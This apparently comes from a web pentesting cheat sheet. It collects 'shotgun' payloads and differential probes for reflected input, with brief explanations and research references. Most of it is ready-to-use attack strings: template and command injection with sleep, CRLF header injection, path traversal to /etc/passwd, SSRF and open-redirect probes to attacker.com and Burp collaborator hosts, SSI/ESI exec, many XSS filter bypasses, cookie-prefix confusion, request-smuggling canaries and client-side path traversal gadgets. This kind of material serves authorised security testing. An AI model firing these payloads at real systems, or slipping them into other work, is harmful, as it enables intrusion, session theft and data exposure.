Web Vulns List

Quick list of shotgun payloads and differential probes to throw at reflected input before pivoting into the dedicated page for each bug class.

Quick shotgun payloads

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Extra differential probes worth trying

These are useful when the reflection looks boring but you suspect parser differences, normalization, or cross-component decoding mismatches.

Unicode / normalization probes

If the app strips dangerous ASCII first and normalizes later, Unicode can turn into the dangerous character only after the filter.

%e2%84%aa
%ef%bc%87
%ef%bc%82

• %e2%84%aa is the Kelvin sign (K) and is a great canary to detect normalization when the application reflects back a plain K.
• %ef%bc%87 / %ef%bc%82 are fullwidth quote variants that can become ' / " after NFKC/NFKD normalization.
• If these mutate, continue in Unicode Normalization.

URL parser discrepancy probes (Open Redirect / SSRF allowlists)

Useful when a backend validates the URL with one parser but the browser, proxy, framework, or downstream client resolves it differently.

<allowed>[@<attacker>
<allowed>:443\@<attacker>
[::1]@[::1]@<attacker>
<attacker>%09<allowed>
<attacker>%0d%0a<allowed>
<attacker>%E2%80%A8<allowed>
<attacker>%E2%80%A9<allowed>

• [ in the userinfo segment has been particularly useful against Spring-based validation logic.
• Tab / CRLF separators are still worth testing when allowlists or regexes are applied before a second parser consumes the URL.
• %E2%80%A8 / %E2%80%A9 (Unicode line / paragraph separators) are useful when a validator applies a multiline regex such as ^allowed$ before a later parser consumes the hostname.
• For a bigger list, continue in URL Format Bypass.

Cookie / prefix confusion probes

When you control a subdomain, have XSS in a sibling subdomain, or can inject cookies indirectly, test parser differences between the browser and the backend.

document.cookie = `${String.fromCodePoint(0x2000)}__Host-name=injected; Domain=.example.com; Path=/;`;
document.cookie = `$Version=1,__Host-name=injected; Path=/anything; Domain=.example.com;`;

• Leading Unicode whitespace may bypass the browser prefix check but normalize to __Host-name server-side.
• Legacy $Version=1 parsing can make some Java stacks split a single cookie string into multiple logical cookies.
• If you have response splitting, header injection, or a proxy that lets you shape a raw Cookie: header, also test spaces / tabs around = together with $Version=1 because some legacy parsers will still recognize the injected pair even when brittle filters do not.
• If either works, continue in Cookies Hacking.

Desync / parser-differential canaries

Use these to quickly check whether the front-end and back-end disagree on header parsing before moving to the full desync methodology.

Host : attacker.tld
Content-Length:
 7

GET /404 HTTP/1.1
X: Y
TRACE / HTTP/1.1
X-Reflect: <script>alert(1)</script>

• Host : vs Host: can expose hidden/visible parsing differences.
• Multiline Content-Length is a classic 0.CL canary.
• If TRACE reaches the backend, it can become a reflection gadget during desync exploitation.
• For the full workflow, continue in HTTP Request Smuggling / HTTP Desync Attack.

Client-side path traversal / JSON gadget probes

Use these when user-controlled route params, uploaded metadata, or stored JSON blobs are later concatenated into fetch() / XHR paths.

../../admin/users
..%2f..%2fadmin/users
..;/..;/admin/users
../../../v1/token.css
{"aaa":"WEBP","_id":"../../../../CSPT?"}

• Dot-segment variants are good canaries for CSPT / OSRF when the frontend builds same-origin API paths and automatically reuses cookies or auth headers.
• ../../../v1/token.css is a quick probe for CSPT ➜ cache deception chains where a CDN caches static-looking suffixes but the origin still returns authenticated JSON.
• The JSON snippet is a practical JSON/WEBP polyglot-style gadget: useful when a frontend later calls JSON.parse() on uploaded content but the upload path performs naive image/webp magic-byte validation.
• For the full exploitation workflow, continue in Client Side Path Traversal and Cache Poisoning and Cache Deception.

Modern XSS-only probes

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>#x" />

This is handy when classic img/onerror payloads fail but SVG elements or data: URLs survive filtering.

References

• https://portswigger.net/research/cookie-chaos-how-to-bypass-host-and-secure-cookie-prefixes
• https://portswigger.net/research/http1-must-die
• https://portswigger.net/research/introducing-the-url-validation-bypass-cheat-sheet
• https://blog.doyensec.com/2025/01/09/cspt-file-upload.html